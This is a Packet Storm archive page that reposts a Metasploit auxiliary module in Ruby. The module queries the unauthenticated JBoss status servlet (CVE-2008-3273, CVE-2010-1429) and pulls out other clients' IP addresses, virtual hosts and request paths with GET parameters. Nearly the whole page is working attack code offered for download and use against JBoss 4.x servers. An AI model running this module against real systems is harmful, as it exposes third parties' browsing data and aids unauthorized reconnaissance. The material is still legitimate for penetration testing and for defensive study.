exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

JBoss Status Servlet Information Gathering

JBoss Status Servlet Information Gathering
Posted Sep 1, 2024
Authored by Matteo Cantoni | Site metasploit.com

This Metasploit module queries the JBoss status servlet to collect sensitive information, including URL paths, GET parameters and client IP addresses. This Metasploit module has been tested against JBoss 4.0, 4.2.2 and 4.2.3.

tags | exploit
advisories | CVE-2008-3273, CVE-2010-1429
SHA-256 | ad6d24da1d5376d91cf44a10ef80499ec9a8b2320e76886a8262c5d30ff1784f

JBoss Status Servlet Information Gathering

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner

def initialize
super(
'Name' => 'JBoss Status Servlet Information Gathering',
'Description' => %q{
This module queries the JBoss status servlet to collect sensitive
information, including URL paths, GET parameters and client IP addresses.
This module has been tested against JBoss 4.0, 4.2.2 and 4.2.3.
},
'References' =>
[
['CVE', '2008-3273'],
['CVE', '2010-1429'], # regression
['URL', 'https://seclists.org/fulldisclosure/2011/Sep/139'],
['URL', 'https://owasp.org/www-pdf-archive/OWASP3011_Luca.pdf'],
['URL', 'https://www.slideshare.net/chrisgates/lares-fromlowtopwned']
],
'Author' => 'Matteo Cantoni <goony[at]nothink.org>',
'License' => MSF_LICENSE
)

register_options([
Opt::RPORT(8080),
OptString.new('TARGETURI', [ true, 'The JBoss status servlet URI path', '/status'])
])
end

def run_host(target_host)
jpath = normalize_uri(target_uri.to_s)

@requests = []

vprint_status("#{rhost}:#{rport} - Collecting data through #{jpath}...")

res = send_request_raw({
'uri' => jpath,
'method' => 'GET'
})

# detect JBoss application server
if res and res.code == 200 and res.body.match(/<title>Tomcat Status<\/title>/)
http_fingerprint({:response => res})

html_rows = res.body.split(/<strong>/)
html_rows.each do |row|

#Stage Time B Sent B Recv Client VHost Request
#K 150463510 ms ? ? 1.2.3.4 ? ?

# filter client requests
if row.match(/(.*)<\/strong><\/td><td>(.*)<\/td><td>(.*)<\/td><td>(.*)<\/td><td>(.*)<\/td><td nowrap>(.*)<\/td><td nowrap>(.*)<\/td><\/tr>/)

j_src = $5
j_dst = $6
j_path = $7

@requests << [j_src, j_dst, j_path]
end
end
elsif res and res.code == 401
vprint_error("#{rhost}:#{rport} - Authentication is required")
return
elsif res and res.code == 403
vprint_error("#{rhost}:#{rport} - Forbidden")
return
else
vprint_error("#{rhost}:#{rport} - Unknown error")
return
end

# show results
unless @requests.empty?
show_results(target_host)
end
end

def show_results(target_host)
print_good("#{rhost}:#{rport} JBoss application server found")

req_table = Rex::Text::Table.new(
'Header' => 'JBoss application server requests',
'Indent' => 1,
'Columns' => ['Client', 'Vhost target', 'Request']
)

@requests.each do |r|
req_table << r
report_note({
:host => target_host,
:proto => 'tcp',
:sname => (ssl ? 'https' : 'http'),
:port => rport,
:type => 'JBoss application server info',
:data => "#{rhost}:#{rport} #{r[2]}"
})
end

print_line
print_line(req_table.to_s)
end
end
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close